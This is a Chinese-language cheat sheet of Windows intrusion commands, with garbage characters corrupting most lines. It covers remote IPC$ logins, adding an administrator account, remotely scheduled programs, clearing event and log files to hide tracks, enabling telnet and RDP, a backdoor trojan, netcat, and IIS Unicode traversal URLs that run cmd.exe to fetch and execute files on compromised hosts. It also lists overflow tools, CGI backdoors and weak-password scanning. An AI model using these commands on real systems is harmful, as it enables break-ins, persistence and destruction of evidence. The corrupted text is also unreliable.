网管和黑客都必须知道的命令
^F0jI5j�). 常用的几条NET命令:
Y'H/
$�M N �Z� q�>.;> (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�Q�M=436fq �kc']g:*]Y (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
WK)k�-A^q� R.���'G�g (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
_p2<7x i
� �V�R�P.t�D (查看远程主机时间) net time \\IP地址
0bL=l0�N$W �UT7lj� wT (定时启动某个程序) at \\IP地址 02:18 readme.exe
sW��3D
(
n oc%l�e2 � (查看共享) net view \\IP地址
Xl�Jux_LD: �
�%�!h��+ (查看netbios工作组列表) nbtstat -A IP地址
a��YCz�b7� 4xn^`xf9�
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
a�}�7KpKCD �MCp�K^7]k (这两条把自己增加到管理员组): net user 用户名 密码 /add
@g�Gu�V$Mw {�QkH�%jj� net localgroup Administrators 用户名 /add
+~.Jw#Hq�S Tka="eyIj3 (断开连接) net use \\IP地址\ipc$ /delete
m�BkQ
8�e |Qm%G�\oB? 扫尾:
0]0M>vx
u� �`ViNSr):J del C:\winnt\system32\logfiles\*.*
:�>ST)Y@]w < i�o8
b|A del C:\winnt\ssytem32\config\*.evt
%�=
�
;K>D :@�A;!'zpL del C:\winnt\system32\dtclog\*.*
O�Wfj<#}t+ `;2`�H, G' del C:\winnt\system32\*.log
Xn'>k[}�<k (Sp�~+#XnF del C:\winnt\system32\*.txt
��1Nu`@)D0 1c�~�#�]6[ del C:\winnt\*.txt
b>�._ r�&. leJ�d)�{�� del C:\winnt\*.log
HD�|)D5wH| _JO @O^Ndd 一、netsvc.exe
X1D:{S[�� �X�_8NW�,� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
6x8|v7cM�H wIHz TL� netsvc /list \\IP地址
%d\+�(:uu/ �Gw,�kC{:C netsvc schedule \\IP地址 /query
&}=,8G�t1G M<pga�B0� netsvc \\IP地址 schedule /start
�u#|Jl|�aT qiJ�{X�{lI 二、OpenTelnet.exe
k5
�l�~� q2i~<;Z)�9 远程启动主机的Telnet服务,并绑定端口到7878,例如:
Y�L�0RQ��a Hf|:A(vCx OpenTelnet \\IP地址 用户名 密码 1 7878
lB@K;E@r8� +c�_CYkHJ/ 然后就可以telnet到主机的7878端口,进入DOS方式下:
?V&a |:N9 G<1mj!{V�p telnet IP地址 7878
+�q�%goG�8 �"
N4]e/.V 三、winshell.exe
<N&�f >�7 p�4_�uY7^6 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
j'n�= ��Xh (E��[��h�l p Path (查看winshell主程序的路径信息)
[}�3Y1t{G� ^[ak�B|#\9 b reBoot (重新启动机器)
7|Y8^�T
s� ���t/(j�8w d shutDown (关闭机器)
��)}5r��s� �b=EZ�tk6> s Shell (执行后你就会看到可爱的“C:\>”)
�9Ua��@��- /% 1l��JD x eXit (退出本次登录会话,此命令并不终止winshell的运行)
m�JT
m/�C ��O�SU�=O� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�0[��Aa2H* mj~CCokF{? 四、3389登陆器,GUI方式登录远程主机的
Y
[S^&pF�� FFGTIT# {" 五、elsave.exe
(^\i(cfu6Q '5\1uB PKW 事件日志清除工具
�+[+�Jd�)Z _Z&�R'�`kg elsave -s \\IP地址 -l "application" -C
;_*F [�
}w �Pp!�W$C:� elsave -s \\IP地址 -l "system" -C
`BY`�lt�W�
eD�0@n
�: elsave -s \\IP地址 -l "security" -C
N�%�y���FL ��en)DN3�� 执行后成功清除应用程序日志,系统日志,安全日志
b
L~<~��gA e�yV904<�F 六、hbulot.exe
.j�w)e!<\N =Y0�m;-1�M 开启win2kserver和winxp的3389服务
MvFXVCT�#� RR|�Eqm�3) hbulot [/r]
�.EQFHSt�r �ln7.�>.F� 使用/r表示安装完成后自动重起目标使设置生效。
/�2� N%Z e��KO�Txv{ 七、nc.exe(netcat.exe)
mH"`4���6� Q�<q�IlN�E 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
@hPbD�?�)M �Ja1*a,],L 想要连接到某处: nc [-options] hostname port[s] [ports] ...
m�Hy]��$�Z 2B�Y:q�z%: 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
!$HW�UxM;p j��L<.?HE� 参数:
X(9F�f=0.~ KNhH4K2iP8 -e prog 程序重定向,一旦连接,就执行 [危险!!]
DGn�swN%n1 l�L�v0�lf� -g gateway source-routing hop point[s], up to 8
�xB#E&}Ho� cAS5�&�T�< -G num source-routing pointer: 4, 8, 12, ...
�HS7!����O �E�C0auB7G -h 帮助信息
r{�_'�2Z_i �K��k�m7L- -i secs 延时的间隔
�K�hl7�E�z ��XA68H!�I -l 监听模式,用于入站连接
YX(%�jcj*� ~�S9nLb:O{ -n 指定数字的IP地址,不能用hostname
x�4��K�5�� FKP^f\�!�M -o file 记录16进制的传输
��j&9~OXYv N��INi�X�( -p port 本地端口号
F)G#��\�r (@Bm2g���H -r 任意指定本地及远程端口
�FW4 hqgE@ ��PZ���s�� -s addr 本地源地址
Z:Wix|,ONS EMo�6$��(� -u UDP模式
"M��
�tQj} kH'Cx^=c6h -v 详细输出——用两个-v可得到更详细的内容
'%,Re-8�O� �E:yt�daiT -w secs timeout的时间
7bl�ZAA�?- ?l/rg6mbI' -z 将输入输出关掉——用于扫描时
x?�kZD~|{) 八、TFTPD32.EXE
T�>?~eYHXs KME��
#5=~ 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
@N$��r�'�@ $W2�AiE[Wm http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
�+J�}� 41� �k1�<Py$9" 然后可以直接令文件运行:
�fiZ8s�=J� �-:QyWw�/d http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
-'2.^a-8-g �?�cJ$��=� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
jL#� �ak�V fITm�l6mbE 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
�V�swi /�( �P|?z1JUd� 一、一 Xscan命令行运行参数说明:
>E�t?7@
�� H�_Y�y.yi� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
=cQ�w�R:): �ATU@5,��9 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
<��i5^izg� [q�z6_W�Oo xscan -file <主机列表文件名> <检测项目> [其他选项]
aj\'qRrU$ #[�8gH>�7� 其中<检测项目> 含义如下:
R8E��<;^?j L�%D�L
n�� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
AYi$L�sLhO hug�12�C�u -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
YA��NEdH`d +38t82%YWo -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
Vl��EkT9^: ���&
�2b�f -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
JjwuxZVr O >�<=af� 9T -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
[X�r�q+O, ��X�}ZOjX! [其他选项] 含义如下:
1l�i`+~L
F 75F&s,4+� -v: 显示详细扫描进度
)D^���P~2� @ZVc!5J_�, -p: 跳过Ping不通的主机
�%�/s1ma6q H\�^^p�!^) -o: 跳过没有检测到开放端口的主机
1Nz�\3]�- ..!yf e�"5 -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
